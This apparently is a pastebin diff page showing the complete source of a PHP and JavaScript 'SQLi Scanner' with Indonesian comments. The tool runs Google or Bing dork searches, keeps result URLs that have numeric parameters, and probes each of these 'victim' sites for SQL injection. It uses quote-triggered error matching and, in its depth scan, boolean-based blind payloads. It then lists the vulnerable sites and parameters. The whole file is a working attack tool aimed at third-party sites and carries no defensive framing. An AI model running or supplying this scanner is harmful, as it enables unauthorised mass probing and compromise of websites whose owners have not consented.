View difference between Paste ID: <a href="/GDutCgzJ">GDutCgzJ</a> and <a href="/NL6qCmzF">NL6qCmzF</a>

<?php
1		<?php
2		/* Google dork scanner
3		* yepss... you know what this is
4		*
5		*/
6
7
8		@error_reporting(0);
9		@set_time_limit(60);
10
11		function fetch($url) {
12		if(!function_exists("curl_init")){
13		$bu = trim(@file_get_contents($url));
14		if($bu == "") return "";
15		else return $bu;
16		}
17
18		$header[] = "Accept-Language: en";
19		$header[] = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3";
20		$header[] = "Connection: Keep-Alive";
21		$header[] = "Pragma: no-cache";
22		$header[] = "Cache-Control: no-cache";
23
24		$ch = curl_init();
25		curl_setopt($ch, CURLOPT_URL, $url);
26		curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
27		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE );
28		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
29		curl_setopt($ch, CURLOPT_TIMEOUT, 7);
30		curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
31		$content = curl_exec($ch);
32		curl_close($ch);
33		return $content;
34		}
35
36		function sqlcheck($url_){
37		// clean url
38		$url_ = "http://".trim(str_ireplace("http://","",$url_));
39		$url_ = str_ireplace("&","&",$url_);
40		$urls = explode("?",$url_);
41		// check if url contains querystring
42		if(count($urls)==2){
43		$url = $urls[0];
44		$querys = explode("&",$urls[1]);
45		foreach($querys as $query){
46		$vars = explode("=",$query);
47		//echo $query;
48		// check if parameter has a numeric value
49		if((count($vars)>=2) && (is_numeric($vars[1]))){
50		$final = str_replace($query,$query."%27",$url_);
51		//echo $final;
52		$content = fetch($final);
53		if(preg_match("/sql syntax\|sql error\|right syntax to use near\|syntax error converting\|unclosed quotation\|is not a valid MySQL result/i",$content)){
54		return $vars[0];
55		}
56		}
57		}
58		}
59		return ""; // gagal son
60		}
61		function sqlheavycheck($url_){
62		// clean url
63		$url_ = "http://".trim(str_ireplace("http://","",$url_));
64		$url_ = str_ireplace("&","&",$url_);
65
66		// check if url contains querystring
67		$pos = stripos($url_,"?");
68		if($pos !== false){
69		$url = substr($url_,0,$pos);
70		$que = substr($url_,$pos+1);
71
72
73		$querys = explode("&",$que);
74		foreach($querys as $query){
75		$vars = explode("=",$query);
76		//echo $query;
77		// check if parameter has a numeric value
78		if((count($vars)>=2) && (is_numeric($vars[1]))){
79		// and 1=(select 1)
80		$acak = rand(1111,9999);
81		$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%20".$acak."%29--",$url_);
82		$contrue = fetch($final);
83		//echo "final1 : ".$final."<br />";
84
85		// and 1=(select 0)
86		$acak = rand(1111,9999);
87		$final = str_replace($query,$query."%20AND%20".$acak."%3D%28SELECT%200%29--",$url_);
88		//echo "final2 : ".$final."<br />";
89		$confalse = fetch($final);
90
91		$numtrue = strlen(strip_tags($contrue));
92		$numfalse = strlen(strip_tags($confalse));
93		$selisih = $numtrue - $numfalse;
94
95
96		if($selisih >= 30){
97		return $vars[0];
98		}
99		else{
100		//' and 1=(select 1) and '1'='1
101		$acak = rand(1111,9999);
102		$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%20".$acak."%29%20AND%20%271%27=%271",$url_);
103		$contrue = fetch($final);
104		//echo "final1 : ".$final."<br />";
105
106		//' and 1=(select 0) and '1'='1
107		$acak = rand(1111,9999);
108		$final = str_replace($query,$query."%27%20AND%20".$acak."%3D%28SELECT%200%29%20AND%20%271%27=%271",$url_);
109		//echo "final2 : ".$final."<br />";
110		$confalse = fetch($final);
111
112		$numtrue = strlen(strip_tags($contrue));
113		$numfalse = strlen(strip_tags($confalse));
114		$selisih = $numtrue - $numfalse;
115
116		if($selisih >= 30){
117		return $vars[0];
118		}
119		}
120		}
121		}
122		}
123		return ""; // gagal son...
124		}
125
126
127		// debugging tools
128		if(isset($_GET['check'])&&($_GET['check']!="")){
129		$url = $_GET['check'];
130		echo $url." ".sqlcheck($url);
131		die();
132		}
133		if(isset($_GET['heavycheck'])&&($_GET['heavycheck']!="")){
134		$url = $_GET['heavycheck'];
135		echo $url." ".sqlheavycheck($url);
136		die();
137		}
138		// debugging tools end
139
140
141		if(isset($_GET['dork'])&&($_GET['dork']!="")){
142		$gnum = 10; // jumlah hasil pencarian perhalaman
143		$setype = "google"; // default cari pakek g00gle
144		if(isset($_GET['setype'])) $setype = strtolower(trim($_GET['setype']));
145
146		if(isset($_GET['page'])){
147		$gpage = (int) $_GET['page'];
148		if($gpage < 1) $gpage = 1;
149		}
150		else $gpage = 1;
151		$gpage = ($gpage - 1) * $gnum;
152
153		if($gpage > ($gpage * $gnum)){
154		echo "_finish_\|max only ".$gpage." results";
155		die();
156		}
157
158		$dork = stripslashes($_GET['dork']);
159		$dork = str_replace(" ","+",$dork);
160		$dorki = urlencode($dork);
161
162		if($setype == "google"){
163		//g00gle nextbuttn---> <div class=med style=margin-top:2em>
164		$gsearch = fetch("http://www.google.com/custom?num=".$gnum."&hl=en&cx=!009136828022434855111:b1vm8yfl888&q=".$dorki."&start=".$gpage."&sa=N");
165		$raws = explode("<h2 class=r>",$gsearch);
166		if((trim($gsearch) == "") \|\| (count($raws) <= 1) \|\| (preg_match("/div\sclass=med\sstyle=margin-top:2em/i",$gsearch))){
167		echo "_finish_\|no more search results from ".$setype;
168		die();
169		}
170
171		}
172		elseif($setype == "bing"){
173		//bing nextbutton---> class="sb_pagN"
174		$dorki = preg_replace("/^[^:]:(.)/i","\\1",$dork);
175		$gsearch = fetch("http://www.bing.com/search?q=".$dorki."&filt=all&first=".$gpage."&FORM=PERE3");
176		$raws = explode("<div class=\"sb_tlst\"><h3>",$gsearch);
177		if((trim($gsearch) == "") \|\| (!preg_match("/class=\"sb_pagN\"/i",$gsearch)) \|\| (count($raws) <= 1)){
178		echo "_finish_\|no more search results from ".$setype;
179		die();
180		}
181		}
182		else{
183		echo "_finish_\|search engine not supported";
184		die();
185		}
186
187		foreach($raws as $korban){
188		if(strlen($korban) >= 9 && (substr($korban,0,9)=="<a href=\"")){
189		$heavy = false;
190		if((isset($_GET['heavy'])) && ($_GET['heavy']=='1')) $heavy = true;
191
192		$calon = substr($korban,9);
193		$pos = strpos($calon,"\"");
194		if($pos !== false){
195		$url = trim(substr($calon,0,$pos));
196		if(preg_match("/facebook\.\|yahoo\.\|google\.\|youtube\./i",$url)) continue;
197		if(!preg_match("/\w+=\d+/i",$url)) continue;
198
199		if($heavy) {
200		$vulnvar = sqlheavycheck($url);
201		if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
202		else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
203		echo $laporan;
204
205		}
206		else{
207		$vulnvar = sqlcheck($url);
208		if($vulnvar != "") $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\"><span class=\"white\">".$url."</span><span class=\"red\"> @ </span><span class=\"white\">".$vulnvar."</span></a><br />";
209		else $laporan = "<a href=\"".$url."\" target=\"_".rand(1111,9999)."\">".$url."</a><br />";
210		echo $laporan;
211		}
212		}
213		}
214		}
215		die(); // mas kamu koq looyo...
216		}
217
218
219
220		?><html>
221		<head><title>SQLi Scanner</title>
222		<link rel="shortcut icon" href="../favicon.ico">
223		<!-- <?php echo date("Y",time()); ?> Revan Aditya -->
224		<script type="text/javascript">
225		jalan = false;
226		nomer = 1;
227		nomermax = 100;
228		heavy = false;
229
230		function ajax(vars, nom, cbFunction){
231		var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("MSXML2.XMLHTTP.3.0");
232		var querystring = '?' + vars + '&page=' + nom;
233		req.open("GET", querystring , true);
234		req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
235		req.onreadystatechange = function(){
236		if (req.readyState == 4 && req.status == 200){
237		if (req.responseText){
238		cbFunction(req.responseText,vars);
239		}
240		}
241		}
242		req.send(null);
243		}
244		function showResult(str, vars){
245		var box = document.getElementById("result")
246		if(str.match(/Warning\|Fatal/gi)) box.innerHTML += '<span class=\"red\">*** </span> error...<br />';
247		else box.innerHTML += str;
248
249		if(!jalan){
250		box.innerHTML += '<span class=\"red\">*** </span> paused...<br />';
251		document.getElementById("loading").style.visibility = 'hidden';
252		document.getElementById("btnOk").value = "Resume";
253		}
254		else {
255		if(!str.match(/.finish./gi)){
256		sqlCheck(vars);
257		}
258		else{
259		var pesan = str.substring(str.indexOf("\|") + 1);
260		box.innerHTML = '<span class=\"red\">*** </span> finish ( ' + pesan + ' )<br />';
261		document.getElementById('setype').disabled = false;
262		document.getElementById('dork').readOnly = false;
263		document.getElementById("loading").style.visibility = 'hidden';
264		document.getElementById("btnOk").value = "Search";
265		nomer = 1;
266		jalan = false;
267		}
268		}
269
270		var oldYPos = 0, newYPos = 0;
271		do{
272		if (document.all){
273		oldYPos = document.body.scrollTop;
274		}
275		else{
276		oldYPos = window.pageYOffset;
277		}
278		window.scrollBy(0, 50);
279		if (document.all){
280		newYPos = document.body.scrollTop;
281		}
282		else{
283		newYPos = window.pageYOffset;
284		}
285		} while (oldYPos < newYPos);
286		}
287		function keyHandler(ev){
288		if (!ev){
289		ev = window.event;
290		}
291		if (ev.which){
292		keycode = ev.which;
293		}
294		else if (ev.keyCode){
295		keycode = ev.keyCode;
296		}
297		if (keycode == 13){
298		sikat();
299		}
300		}
301		String.prototype.trim = function() {
302		return this.replace(/^\s\|\s$/g, "");
303		}
304		function sqlCheck(xdata){
305		if(jalan){
306		ajax(xdata, nomer, showResult);
307		nomer++;
308		}
309		}
310		function sqlHeavyCheck(xdata){
311		if(jalan){
312		ajax(xdata + '&heavy=1', nomer, showResult);
313		nomer++;
314		}
315		}
316		function sikat(){
317		var btext = document.getElementById("btnOk");
318		if((btext.value == 'Search') \|\| (btext.value == 'Resume')){
319		if(!jalan){
320		if(btext.value == 'Search') nomer = 1;
321		var target = document.getElementById('dork');
322		var setype = document.getElementById('setype');
323		if(target.value.trim().length>0) {
324		document.getElementById("loading").style.visibility = 'visible';
325		document.getElementById("btnOk").value = "Pause";
326		target.readOnly = true;
327		setype.disabled = true;
328		jalan = true;
329		sqlCheck('dork=' + encodeURIComponent(target.value) + '&setype=' + encodeURIComponent(setype.value));
330		}
331		}
332		else alert("Please stop first...");
333		}
334		else {
335		berhenti();
336		}
337		}
338		function initpg(){
339		document.onkeypress = keyHandler;
340		}
341		function berhenti(){
342		jalan = false;
343		}
344		function bersih(){
345		var tanya = confirm("Clear results and restart?");
346		if(tanya == true) location.href = 'index.php';
347		}
348		function checkheavy_fix(){
349		var heavyval = document.getElementById("heavy");
350		if(heavyval.checked) heavyval.checked = false;
351		else heavyval.checked = true;
352		checkheavy();
353		}
354		function checkheavy(){
355		var heavyval = document.getElementById("heavy").checked;
356		var box = document.getElementById("result")
357		if(heavyval) {
358		heavy = true;
359		box.innerHTML += '<span class=\"red\">*** </span> depth scan...<br />';
360		}
361		else {
362		heavy = false;
363		box.innerHTML += '<span class=\"red\">*** </span> quick scan...<br />';
364		}
365		}
366
367		</script>
368		<style type="text/css">
369		*{
370		background:url('../images/bg.gif') #111;
371		font-family: Lucida Console,Tahoma;
372		color:#bbb;
373		font-size:11px;
374		text-align:left;
375		}
376		input,select,textarea{
377		border:0;
378		border:1px solid #900;
379		color:#fff;
380		background:#000;
381		margin:0;
382		padding:2px 4px;
383		}
384		input:hover,textarea:hover,select:hover{
385		background:#200;
386		border:1px solid #f00;
387		}
388		option{
389		background:#000;
390		}
391		.red{
392		color:#f00;
393		}
394		.white{
395		color:#fff;
396		}
397		a{
398		text-decoration:none;
399		}
400		a:hover{
401		border-bottom:1px solid #900;
402		border-top:1px solid #900;
403		}
404		#status{
405		width:100%;
406		height:auto;
407		padding:4px 0;
408		border-bottom:1px solid #300;
409		}
410		#result a{
411		color:#777;
412		}
413		.sign{
414		color:#222;
415		}
416		#box{
417		margin:10px 0 0 0;
418		}
419		</style>
420		</head>
421		<body onload="initpg();">
422
423
424
425		<div id="result"></div>
426		<div id="box">
427		<input type="text" name="dork" id="dork" value="" style="width:400px;" title="Give a keyword to search..." />
428		<select name="setype" id="setype">
429		<option value="google" />Google</option>
430		<option value="bing" />Bing</option>
431		</select>
432		<input type="submit" id="btnOk" name="btnOk" value="Search" onclick="sikat();" style="width:70px;text-align:center;" />
433		<input type="submit" name="btnClear" value="Restart" onclick="bersih();" style="width:70px;text-align:center;" />
434		<span class="sign">revres</span><span class="red">.</span><span class="sign">tanur</span>
435		<img src="../images/loading.gif" alt="" style="margin:0;padding:0;vertical-align:middle;visibility:hidden;" id="loading" title="loading..." />
436		<p><input onclick="checkheavy();" style="vertical-align:middle;margin:0 8px;padding:0;border:0;" type="checkbox" name="heavy" id="heavy" /><a style="vertical-align:middle;" href="javascript:checkheavy_fix();">Depth scan ( slow but sure )</a></p>
437		</div>
438
439
440		<!-- aku suka kamu suka sudah jangan bilang syapaa syapaaa... -->
441		</body>
442		</html>